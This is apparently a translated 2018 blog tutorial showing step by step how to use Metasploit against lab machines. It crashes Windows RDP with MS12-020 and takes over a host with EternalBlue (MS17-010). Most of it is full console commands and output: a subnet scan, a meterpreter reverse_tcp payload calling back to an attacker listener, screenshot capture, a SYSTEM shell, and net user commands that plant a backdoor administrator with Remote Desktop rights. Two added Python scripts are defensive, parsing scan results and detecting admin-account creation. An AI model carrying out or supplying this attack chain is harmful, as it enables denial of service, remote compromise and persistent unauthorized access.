王忘杰

Using Metasploit (MSF) quickly with the MS12-020 and MS17-010 (EternalBlue) vulnerabilities

2018/04/30

Metasploit


What is Metasploit? Metasploit is a free, downloadable framework that makes it easy to obtain and develop exploits for vulnerabilities in computer software and to run them against targets. It is a professional-grade exploitation tool that ships with hundreds of exploits for known software vulnerabilities.

If that is hard to follow, put it another way: countless vulnerabilities are discovered every day. If each of us collected a few, pooled them and reworked them so they are all operated the same way, that is what msf does. msf was originally meant as an exploit development platform, but today it has more often become the arsenal of amateur security enthusiasts and security experts alike: a few mouse clicks and the intrusion succeeds.

MS12-020

MS12-020 is a vulnerability in the Remote Desktop Protocol (RDP). In the worst case it can lead to remote code execution, but in practice it usually just blue-screens the target.

How to use it

Run msfconsole from a terminal to enter the msf framework

Search for the vulnerability module

msf > search 12_020
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                              Disclosure Date  Rank    Description
   ----                                              ---------------  ----    -----------
   auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  MS12-020 Microsoft Remote Desktop Use-After-Free DoS
   auxiliary/scanner/rdp/ms12_020_check                               normal  MS12-020 Microsoft Remote Desktop Checker

Select that module

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 

View the options

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options 

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3389             yes       The target port (TCP)

The module is auxiliary/dos/windows/rdp/ms12_020_maxchannelids; its parameters are RHOST (the target address) and RPORT (the target port).

Set the parameters

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RHOST 192.168.136.129
RHOST => 192.168.136.129
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RPORT 3389
RPORT => 3389
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.136.129  yes       The target address
   RPORT  3389             yes       The target port (TCP)

Run it

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > exploit 

[*] 192.168.136.129:3389 - 192.168.136.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.136.129:3389 - 192.168.136.129:3389 - 210 bytes sent
[*] 192.168.136.129:3389 - 192.168.136.129:3389 - Checking RDP status...
[+] 192.168.136.129:3389 - 192.168.136.129:3389 seems down
[*] Auxiliary module execution completed

Attack complete

The target blue-screens

MS12-020 is one of the simpler exploits in msf: it is good for learning the basic use of the framework and quickly gives the sense of achievement of a successful intrusion.

MS17-010 (EternalBlue)

EternalBlue was the culprit behind the ransomware that swept the globe in 2017. It is the most serious remote code execution vulnerability Microsoft has had in recent years and yields SYSTEM privileges directly; every IT professional should keep systems fully patched at all times to rule it out.

How to use it

Enter the msf framework

root@kali:~# msfconsole 

Search for the MS17-010 modules

search 17_010
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                      Disclosure Date  Rank     Description
   ----                                      ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Detect vulnerable hosts on the internal network

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.136.129/24
RHOSTS => 192.168.136.129/24
msf auxiliary(scanner/smb/smb_ms17_010) > exploit

[*] Scanned  26 of 256 hosts (10% complete)
[*] Scanned  52 of 256 hosts (20% complete)
[*] Scanned  77 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[+] 192.168.136.129:445   - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
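As an added example (not from the original post), here is a small Python parser for the smb_ms17_010 scanner output shown above. It turns the console log into an inventory of hosts that still need the MS17-010 update, grouped by OS build, and records whether the scan actually finished, since the capture above stops at 50%. The sample output, the second host and its banner are constructed.

```python
import re
from collections import defaultdict

# Constructed sample output of auxiliary/scanner/smb/smb_ms17_010, modelled on
# the lines in the post; the second host and its banner are made up.
SAMPLE_SCAN = """\
[*] Scanned  26 of 256 hosts (10% complete)
[+] 192.168.136.129:445   - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] Scanned  52 of 256 hosts (20% complete)
[+] 192.168.136.140:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x86 (32-bit)
[*] Scanned 256 of 256 hosts (100% complete)
"""

VULN_RE = re.compile(
    r"^\[\+\]\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+-\s+"
    r"Host is likely VULNERABLE to MS17-010!\s+-\s+(?P<banner>.+?)\s*$")
PROGRESS_RE = re.compile(r"^\[\*\]\s+Scanned\s+(\d+) of (\d+) hosts")


def parse_scan(text):
    """Return (vulnerable hosts, (scanned, total)) from the scanner console output."""
    hosts, progress = [], (0, 0)
    for line in text.splitlines():
        m = VULN_RE.match(line)
        if m:
            banner = m.group("banner")
            arch = "x64" if "x64" in banner else "x86" if "x86" in banner else "unknown"
            hosts.append({"host": m.group("host"), "port": int(m.group("port")),
                          "banner": banner, "arch": arch})
            continue
        p = PROGRESS_RE.match(line)
        if p:  # keep the last progress line so we know how far the scan got
            progress = (int(p.group(1)), int(p.group(2)))
    return hosts, progress


def patch_list(hosts, progress):
    """Group findings by OS build string (one update per build) and flag partial scans."""
    by_build = defaultdict(list)
    for h in hosts:
        by_build[h["banner"]].append(h["host"])
    scanned, total = progress
    return {"complete": total > 0 and scanned >= total, "builds": dict(by_build)}


if __name__ == "__main__":
    found, prog = parse_scan(SAMPLE_SCAN)
    print(patch_list(found, prog))
```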

Load the exploit module

msf auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Configure it

msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.136.129
RHOST => 192.168.136.129
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.136.131
LHOST => 192.168.136.131
msf exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.136.129  yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.136.131  yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Launch the attack

msf exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.136.131:4444 
[*] 192.168.136.129:445 - Connecting to target for exploitation.
[+] 192.168.136.129:445 - Connection established for exploitation.
[+] 192.168.136.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.136.129:445 - CORE raw buffer dump (53 bytes)
[*] 192.168.136.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.136.129:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
[*] 192.168.136.129:445 - 0x00000020  65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  e 7601 Service P
[*] 192.168.136.129:445 - 0x00000030  61 63 6b 20 31                                   ack 1           
[+] 192.168.136.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.136.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.136.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.136.129:445 - Starting non-paged pool grooming
[+] 192.168.136.129:445 - Sending SMBv2 buffers
[+] 192.168.136.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.136.129:445 - Sending final SMBv2 buffers.
[*] 192.168.136.129:445 - Sending last fragment of exploit packet!
[*] 192.168.136.129:445 - Receiving response from exploit packet
[+] 192.168.136.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.136.129:445 - Sending egg to corrupted connection.
[*] 192.168.136.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.131:4444 -> 192.168.136.129:49567) at 2018-04-30 23:31:53 +0800
[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Capture the target's desktop

meterpreter > screenshot
Screenshot saved to: /root/VrBAGsTE.jpeg


Get a shell

meterpreter > shell
Process 4088 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>

Add an administrator account and put it in the Remote Desktop group

net user test test123 /add
net localgroup administrators test /add
net localgroup "Remote Desktop Users" test /add
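The three commands above leave a clear trail in the Windows Security log: event 4720 (a user account was created) followed by 4732 (a member was added to a security-enabled local group). As an added example, not part of the original post, the Python below correlates those events to flag a brand-new account that is granted Administrators or Remote Desktop Users membership within minutes. The sample events and hostname are constructed; rating a machine account (name ending in "$") as the actor "high" is an assumption based on the injected shell running as SYSTEM.

```python
from datetime import datetime, timedelta

# Local groups whose membership grants admin or remote-login rights.
WATCHED_GROUPS = {"administrators", "remote desktop users"}
WINDOW = timedelta(minutes=10)

# Constructed sample events (subset of Security 4720 / 4732 fields), modelled on
# what the post's `net user` / `net localgroup` commands would produce.
SAMPLE_EVENTS = [
    {"time": "2018-04-30T23:33:40", "id": 4720, "target": "test", "subject": "WIN-2008R2$"},
    {"time": "2018-04-30T23:33:41", "id": 4732, "group": "Administrators", "member": "test", "subject": "WIN-2008R2$"},
    {"time": "2018-04-30T23:33:42", "id": 4732, "group": "Remote Desktop Users", "member": "test", "subject": "WIN-2008R2$"},
    # Benign: a service account created by helpdesk and promoted two days later.
    {"time": "2018-04-30T09:10:00", "id": 4720, "target": "svc_backup", "subject": "helpdesk"},
    {"time": "2018-05-02T09:10:00", "id": 4732, "group": "Administrators", "member": "svc_backup", "subject": "helpdesk"},
]


def _ts(ev):
    return datetime.fromisoformat(ev["time"])


def detect_fresh_admin(events, window=WINDOW):
    """Flag a just-created local account added to a watched group within `window`.

    A machine account (name ending in '$') as the actor means the commands ran
    as SYSTEM, which is how a shell injected by a kernel exploit appears, so
    such hits are rated 'high' (assumption).
    """
    created = {}
    ordered = sorted(events, key=_ts)
    for ev in ordered:
        if ev["id"] == 4720:
            created[ev["target"].lower()] = ev
    alerts = []
    for ev in ordered:
        if ev["id"] != 4732 or ev["group"].lower() not in WATCHED_GROUPS:
            continue
        c = created.get(ev["member"].lower())
        if c is None or not (timedelta(0) <= _ts(ev) - _ts(c) <= window):
            continue
        alerts.append({"member": ev["member"], "group": ev["group"], "actor": ev["subject"],
                       "age_s": int((_ts(ev) - _ts(c)).total_seconds()),
                       "severity": "high" if ev["subject"].endswith("$") else "medium"})
    return alerts


if __name__ == "__main__":
    for a in detect_fresh_admin(SAMPLE_EVENTS):
        print(a)
```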

The intrusion is complete.

MS17-010 is of medium difficulty in msf: it involves scanning, configuring the reverse connection, capturing the desktop and privilege escalation, which makes it a very good learning subject.

Last modified: 21 July 2018, 08:50 AM
